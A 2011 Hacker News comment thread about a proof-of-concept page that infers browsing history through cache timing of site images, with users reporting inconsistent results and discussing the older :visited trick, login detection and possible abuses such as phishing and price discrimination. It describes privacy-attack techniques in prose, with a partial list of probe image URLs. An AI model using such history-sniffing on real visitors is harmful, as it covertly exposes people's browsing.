Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
I too know the websites you visited (oxplot.github.com)
187 points by oxplot on Dec 3, 2011 | hide | past | favorite | 93 comments


Throwaway account. My company created an analytics product around the ability to track which sites your visitors have visited. It used a different and (at the time) more reliable technique.

About a year after the product launch we were contacted by a powerful washington based lobby group and they wanted to chat. They felt it violated a site visitor's "reasonable expectation of privacy". I agreed. So we pulled the feature and dodged a bullet as this "browser bug" hit the mainstream press a few months later. The feature wasn't a major part of our product's value prop, few of our customers used it and none missed it.

So if you're thinking about basing a startup on this, don't. You will get a call very quickly from organizations much larger than you are asking awkward questions.


I wonder if they have contacted Facebook about some of their practices, which may be similar?


Related, an advertising company who was accused of tracking history: http://cyberlaw.stanford.edu/node/6695


Open-source it?


I'm sure it's the trick where you make a bunch of links to various sites, set a :visited color, and then interrogate all of the links with javascript to see what color they are. It's no longer possible on most browsers.


Somehow I think with a throwaway account that's probably not likely.


Not even close, while all the sites it said I visited, I had, it missed tons of other sites I'd visited.


It said I have not visited any of them, except google (there it just says "whoops", I'm not sure if that is a hit or not).


Yup, got the same. Then rerunning it said I'd visited almost all of the sites.


You'd expect that, as it works by loading an image from each of those sites.

So your cache will end up with images from each of those sites.


I get what you're saying, but if the technique really worked, I'd expect it to have told me the sites I frequently visit on the first run and a 100% score on the second run, but it was only like 80% of that.


Same here on ipad


Same here. Zero false positives, but several false negative results.


Same here, it failed to catch Google and I am there almost daily. (Mostly for the doodles.)


same here. funny thing is that all correct matches were for sites actually opened in another tab and it even missen facebook which was also open in some tab.


Same here. There were 3 correct positives listed, and I had about 7 or 8 false negatives.


Same here, although I visited multiple sites listed in the very same session on the browser I have open, the tool only reported one as visited, and Google as a Whoops. It should have reported at least 6 more!


I think it got 100% for me, on Safari/Mac.

Note that it doesn't need to be 100% accurate to be effective. If it guesses better than 50% (i.e. coin flip), then it could be used to give guesses with at least some confidence. No different than analyzing any other noisy dataset. Because this all works client-side, it can also be done quite invisibly.


Right, but those applications will be for things like online advertising, which is already tracking your visits and/or just assuming you use the popular sites anyway. Can this be used to violate privacy in a meaningful manner if it misses 50% or more of the time? You'd have complete plausible deniability if you were pinned to have accessed some site you don't want people to know you accessed. It can't be used as evidence in anything. What would the threat look like?


I oppose user tracking not necessarily because there's something to hide, but because a sense privacy is a fundamental component of a sense of independence, and for me, independence is one of the critical components of happiness.


It would have to guess better than anonymous modelling, not 50%. I'd happily bet even odds layout that each of my site visitors visit Google.


If the question is "Has this user visited site X?" then I'd hope that any kind of modelling is better than 50%, as simulating a coin toss would be at least as good.


there is already way better and reliable methods to accomplish same goal. e.g

http://ajaxian.com/archives/spyjax-using-avisited-to-test-yo...


I was under the impression that attempts had been made to hide any effects of :visited styles on the accessible DOM to stop this from working. There's a particularly good article on Mozilla's attempts [1], and the relevant bug on Bugzilla. [2]

[1]: http://dbaron.org/mozilla/visited-privacy

[2]: https://bugzilla.mozilla.org/show_bug.cgi?id=147777


There's another trick you can use, for detecting if somebody is logged in to certain sites. See:

https://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Pri...

Although, the Google test on that page is currently broken. The Facebook and Twitter ones aren't.


Apparently the key to people not knowing where you visited is to use IE. It missed sites like Twitter and Facebook that are open for me all the time. It did get one site correct, HN ;<).


It guessed HN correctly for me the first time, but on the second run it said I hadn't visited any of the sites, including HN. Perhaps a bug..


What would be a possible use of this attack? I can't think of anything useful you'd do with knowing that you've visited Facebook. And so many people use sites like Facebook you might get a better success rate just always returning "visited" rather than measuring this way!


If a malicious website can tell which banking websites you have visited, it can show a phishing page that looks just like your bank.


Maybe you could use it to only show those social sharing widgets that are for services the visitor actually uses. Though I guess WebIntents will eventually be a better way to handle that.


Ad retargeting without going through one of the high-reach ad networks. Or any product site instantly knowing which competitors you've researched, and tailoring their pricing to that.


Old but related: Using your browser URL history to estimate gender http://www.mikeonads.com/2008/07/13/using-your-browser-url-h...

Seems like i'm 50% male 50% female :D


That's because the CSS trick it uses doesn't work any more.

It would be interesting if someone updated it to use this new trick or even just as a Chrome extension.


Nope. Only got 1 right.

Best of luck, it's an interesting concept!


It's kind of comforting to see the fails here...


Again, this seems to be inaccurate for a large number of people. Can we take these two attempts as evidence that is hard for malicious websites to discern our browser history?


With the exception of Facebook (which I visited this morning), the results were accurate (Amazon, reddit, linkedin, wikipedia, youtube). Spoooky!


Said I hadn't visited any of the sites, except HN (which is easy to guess since news.ycombinator.com will be in the HTTP_REFERER field...).

If I re-run the test it still gets some sites wrong (says I haven't visited them when in fact I have). It even claims I haven't visited Amazon both times when in fact it's open in another tab.


I just tried it twice, once on a public wi-fi network. And then again when I got home. It worked very well on the public wifi, and had many false positives at home.

It seems to work better on slower internet connections. The script returns calls a site "visited" if the response time of the potentially cached image is less than 1/20 the time of the certainly uncached image.

On slow connections the cache is much faster than the uncached. On fast connections it's only slightly faster. However, the known uncached images sometimes have "10x increase in latency" so it seems that based on my (and other's experience) that this is a major problem.

One could attempt to normalize this for the sites where appending random query string causes higher latency. Simply precalculate the added latency from images with the random query string on a per site basis. Then subtract it from "uncachedTime."


Doesn't appear to guess correctly in Chrome 15 on OS X (10.7.2). I'm not sure exactly what the 'whoops' means for google - but I've obviously visited HN and have visited a few of the others as well.

Screenshot: http://cl.ly/1i0921270W2b1u190b0W


Didn't work on Opera on Linux (said I never visited any of those sites)


RequestPolicy prevents that approach.


Damn right. Don't handout cookies to strangers unless you're a girl scout.


the Images :

  facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',

  twitter: 'https://twitter.com/images/spinner.gif,

  digg:http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png,

  reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png,

  hn: 'http://ycombinator.com/images/y18.gif,

  stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png,

  wired: 'http://www.wired.com/images/home/wired_logo.gif,

  ....


Really interesting concept. This one wasn't as accurate for me as the original Firefox-specifc proof of concept, though. It only picked up on YouTube and Wikipedia. What's with the "whoops" on Google?

I do use NoScript and Ghostery, though, and I could see how that might cause some false negatives.


When the script is run the second time, it will show that every site was visited. After the first visit, guess its cached and cannot figure out if its a hit or a fail :)

Running in Chrome's incognitive mode is a bit different though. only 7 show up cached the first time its run.


It said "not visited" for EVERYTHING, except google which says "whoops". I have visited nearly all of them in the last 2 months.

But don't despair, I have one of the most hostile browser settings. I have RequestPolicy, NoScript,and Flashblock.


Same results here, and I'm not running any of the things you mentioned; also been to many of those sites, within the past few days in many cases. I'm basically on stock Chrome (though I do have Adblock).


Same for me. I then opened facebook in a tab, reran it and it said I had visited every site except facebook.


Safari with adblock and ghostery here, got 8 correct and 18 false positives.


Interesting concept, but I'm quite certain that I haven't only been on xkcd.

http://dispatched.ch/pic/visipisi-20111203-214939.jpg


Mostly right for me except it didn't know I visited twitter and facebook (both tabs are open right now).

That's probably due to me blocking facebook and twitter widgets on sites other than Fb and twitter though.


In my case, the ones it got wrong were the images that returned a 304 (not changed) header since they returned significantly faster than fetching the full image.


It said no to sites I had visited. Unless that is what is was programmed to do I'd say it did not work. You can message me for any other info about the test.


From the 5 sites I visited, it correctly flagged HN, WP and YT as visited, and gave a "whoops" for FB and Google (what does that mean?), which I both visited.


I got extremely inconsistent answers on multiple runs.


Indeed, as the second time you run it, you have visited all those sites, and some of those images are in the cache.

The first time, I had one 'visited', the second time about half were 'visited'. I'm surprised not all of them were, though...


No, you don't. One false positive, many woops, quite a few false negatives. After calling the script a second time, almost all guesses are wrong.


Apparently I haven't visited HN. :)

I wonder if the use of ghostery, no-script, that sort of thing, is what bamboozles it? Overall, it looks like it's guessing.


Completely wrong. Said I visited some I haven't heard of, whooops on Google, and not visited on most of those that I've been to recently.


It got all of them right for me (Chrome, Windows XP) except for twitter. I got a "whoops" for google multiple times.


Big miss for Twitter, but cool idea anyway.


The results are not consistent. Each time I click the button it keeps changing and also lists the wrong sites.


A second try gives me a 'visited' result on almost every page (except techbuy).

The first try was pretty correct though.


It only got 4 out of 15 correct for me.


It says I've visited HN and Slashdot. I haven't been to slashdot this year, but I did go to facebook...


Dead on for me. Chrome under Ubuntu.


Did not work at all for me. The other one had slightly better results. Win 7 on most recent FF.


Got only 1 for me- youtube.

Several others it said I didn't visit but I did.

And it said I visited linkedin, and I didn't.


Interesting. Twitter and HN yes, Facebook and LinkedIn no. Chromium on Debian.


I'm on Firefox 9.

For all the entries I got "not visited", even though I visit a lot of them.


Extremely wrong on Chrome. The first time I ran it, it said I had not visited any of them. Google and HN were definitely browsed today.

Ran it again, ALL of them appeared visited. Even sites like abebooks, which I have not visited at all.


That's because the second time you ran it, all the images were in your cache from the first time you ran it. That's the expected result.


Yet another reason this test is useless. If site A uses it, it may get partially correct data, but when you browse to site B, it will return 100% positive, most of these being false positives.

I just don't see any practical application for this method with such high error rates. The methods mentioned above are only valuable if you can guarantee at least relative reliability. By and large the results have been seemingly random, with only one or two persons reporting 100% correctness. So what's the difference between running a test with wildly unreliable results and just doing something randomly?


First, it's a proof of concept, that's all.

Even so, even without doing any work to ameliorate these flaws, it could still be (ab)used. Don't assume that it's only useful if everyone can scan which of the top 100 websites you've visited.

Any site could use this to check which competitors' sites have been visited. It's unlikely anyone else has an interest in checking that information, so the cache is not going to be poisoned by anyone else. With knowledge of which competitors a potential customer has checked out, you could do some effective price discrimination -- the guy looking at the $10 solutions sees your lowest price, while the guy looking at some competing Microsoft Dynamics package enters a more enterprisey sales funnel.

It's also useful for retargeting. Throw the code up on an ad network and you only test for cache hits against domains of current advertisers. If there's a hit, store it in a cookie so you don't need to check the (now filled) cache again. You can now show ads for companies a person has already had an interaction with, without having to cookie every visitor to the advertisers' sites first.

It doesn't take much to come up with (mostly nefarious) uses for this, even without perfect accuracy and even without the ability to have multiple parties check the same URLs.

It also doesn't take much to come up with ways to improve the process. You can ameliorate the problem of overlapping testers by having a large pool of URLs from each site to check. The average top 1000 site probably has dozens and dozens of images and other resources per page, each of which can be used for a cache test.


First of all, I was explaining my experience. Second,I know it is a proof of concept. Still, I don't think it really does prove any concept, since the results are not reliable at all. A proof of concept, requires to give you a reliable results, hence a proof.


Three false negative, one false positive, and one "whoops".


Guessed all of mine correctly with Chrome on Mac. Scary.


The other one worked fine on iOS. Yours failed all tests.


got it mostly right initially, I then visited facebook (which it said I hadn't been to), it then told me I visited ALL the websites (except facebook).


that makes sense though (mostly), after you test once all the images are cached on the second run.


Nice trick; though it's a once in a cache-time event.


Got three - one false positive. Firefox on linux


only got HN for me, using Chrome 15 on OSX.


Fails for me on Safari 5.1.2 / OS X. It got 1 site right, 1 site wrong, the rest being "not visited".


Not even close, too. Instead of measuring load time, you can create "<a>" elements verify their rendered color is the color you defined for visited links. It's a trick of old times...


a trick that all modern browsers have fixed


hmm. I thought it's impossible to block that solution since a coder should be able to get the computed value of a style property. I'll try it soon.


More accurate but a couple of false positives.

Chromium on Linux



as mentioned elsewhere in this thread, that loophole has been closed by all modern browsers. not to say there aren't other ways to get at that information, but it's not as simple as checking the color of a link anymore.


Missed about 75% for me.


try running it again. it will say you visited them all !

script FAIL !




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: